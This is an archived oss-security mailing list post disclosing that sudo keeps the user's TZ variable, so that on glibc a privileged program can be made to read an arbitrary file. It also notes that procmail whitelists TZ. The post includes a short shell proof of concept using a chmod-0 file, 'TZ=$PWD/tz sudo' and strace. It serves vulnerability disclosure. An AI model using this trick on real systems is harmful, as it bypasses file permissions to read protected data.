Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 16 Oct 2014 00:35:32 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Abusing TZ for fun (and little profit)

By default, sudo preserves the TZ variable[1] from user's environment. 
This is a bad idea on glibc systems, where TZ can be abused to trick the 
program to read an arbitrary file. PoC:

$ echo moo > tz
$ chmod 0 tz
$ cat tz
cat: tz: Permission denied
$ TZ=$PWD/tz sudo -u root strace -e read date
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
read(3, "moo\n", 4096)                  = 4
read(3, "", 4096)                       = 0
Wed Oct 15 20:42:42  2014
+++ exited with 0 +++


Procmail is another program that recklessly whitelists TZ[2].


[1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
[2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13

-- 
Jakub Wilk

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.